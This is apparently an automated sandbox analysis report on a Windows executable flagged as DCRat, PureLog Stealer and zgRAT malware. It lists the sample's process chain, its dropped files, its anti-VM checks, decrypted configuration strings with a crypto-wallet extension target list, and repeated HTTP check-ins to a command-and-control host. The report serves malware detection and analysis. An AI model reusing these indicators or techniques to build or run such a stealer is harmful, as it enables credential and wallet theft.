Windows Analysis Report
8k1e14tjcx.exe

Overview

General Information

Sample name: 8k1e14tjcx.exe (renamed because original name is a hash value)
Original sample name: 517d21cbe45c2a88930aa345c2a5c36b.exe
Analysis ID: 1579116
MD5: 517d21cbe45c2a88930aa345c2a5c36b
SHA1: f8c2b259ed15eb455fc345f54a9ef9b0aace552c
SHA256: 4b9cb0b6b953edda63999ddd41656c7c509cfb02298eaac8929010c29971cec9
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 8k1e14tjcx.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\8k1e14tjcx.exe" MD5: 517D21CBE45C2A88930AA345C2A5C36B)
    • wscript.exe (PID: 7312 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ChainFontruntimeCrt.exe (PID: 7412 cmdline: "C:\ChainagentComponent/ChainFontruntimeCrt.exe" MD5: 64105CB19AC25A6275C7D929937090A0)
          • cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7564 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7580 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • yeeQesPXxpnDuwPWqTnUoVbi.exe (PID: 7664 cmdline: "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe" MD5: 64105CB19AC25A6275C7D929937090A0)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
8k1e14tjcx.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
8k1e14tjcx.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000004.00000000.1706629169.0000000000212000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1697920956.0000000005878000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1696822133.0000000006F30000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.8k1e14tjcx.exe.58c6709.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
4.0.ChainFontruntimeCrt.exe.210000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4.0.ChainFontruntimeCrt.exe.210000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.8k1e14tjcx.exe.6f7e709.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

System Summary

Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\8k1e14tjcx.exe", ParentImage: C:\Users\user\Desktop\8k1e14tjcx.exe, ParentProcessId: 7268, ParentProcessName: 8k1e14tjcx.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" , ProcessId: 7312, ProcessName: wscript.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-20T21:17:27.910497+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 37.44.238.250 | 80 | TCP

AV Detection

Source: 8k1e14tjcx.exe, Avira: detected
Source: C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\HqZFZAkM.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\hgJAcPUI.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\sUnrMbPq.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\ZXODDOCy.log, Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\xWHHAgmB.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe, Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\PjjNTCHQ.log, Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, ReversingLabs: Detection: 83%
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe, ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe, ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\GFbXjJsj.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\HZSnKfqJ.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\PjjNTCHQ.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\QZsVJdpt.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\ZXODDOCy.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\hgJAcPUI.log, ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\otzSQnXU.log, ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\phDaBATS.log, ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\sUnrMbPq.log, ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\xHFppYee.log, ReversingLabs: Detection: 37%
Source: C:\Windows\AppReadiness\yeeQesPXxpnDuwPWqTnUoVbi.exe, ReversingLabs: Detection: 83%
Source: 8k1e14tjcx.exe, ReversingLabs: Detection: 65%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HqZFZAkM.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GFbXjJsj.log, Joe Sandbox ML: detected
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\sUnrMbPq.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZXODDOCy.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QZsVJdpt.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\xWHHAgmB.log, Joe Sandbox ML: detected
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\OfficeClickToRun.exe, Joe Sandbox ML: detected
Source: C:\ChainagentComponent\yeeQesPXxpnDuwPWqTnUoVbi.exe, Joe Sandbox ML: detected
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Joe Sandbox ML: detected
Source: 8k1e14tjcx.exe, Joe Sandbox ML: detected
                                    Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"}}
                                    Source: 00000004.00000002.1756943981.0000000012994000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-7QSmDzANvDkQAgXpPhWh","0","","","0","0","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxhYlVaell6SlZhVXhEU1hsSmFtOXBXbTFHYzJNeVZXbE1RMGw2U1dwdmFXUklTakZhVTBselNXcFJhVTlwU2pCamJsWnNTV2wzYVU1VFNUWkpibEo1WkZkVmFVeERTVEpKYW05cFpFaEtNVnBUU1hOSmFtTnBUMmxLYlZsWGVIcGFVMGx6U1dwbmFVOXBTakJqYmxac1NXbDNhVTlUU1RaSmJsSjVaRmRWYVV4RFNYaE5RMGsyU1c1U2VXUlhWV2xNUTBsNFRWTkpOa2x1VW5sa1YxVnBURU5KZUUxcFNUWkpibEo1WkZkVmFVeERTWGhOZVVrMlNXNVNlV1JYVldsTVEwbDRUa05KTmtsdVVubGtWMVZwWmxFOVBTSmQiXQ=="]
Source: 8k1e14tjcx.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\yeeQesPXxpnDuwPWqTnUoVbi.exe
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\db08104604e511
Source: 8k1e14tjcx.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8k1e14tjcx.exe
Source: C:\Users\user\Desktop\8k1e14tjcx.exe, Code function: 0_2_00E9A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E9A69B
Source: C:\Users\user\Desktop\8k1e14tjcx.exe, Code function: 0_2_00EAC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00EAC220
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user\AppData
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user\AppData\Local\Temp
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\ChainagentComponent\ChainFontruntimeCrt.exe, File opened: C:\Users\user\AppData\Local

Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 37.44.238.250:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View, IP Address: 37.44.238.250 37.44.238.250
Source: Joe Sandbox View, ASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
Source: global traffic, HTTP traffic detected:
POST /provider_cpugame.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 703648cm.renyash.top
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 1512Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2004Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2204Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2640Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2192Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2220Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /provider_cpugame.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 703648cm.renyash.topContent-Length: 2644Expect: 100-continue
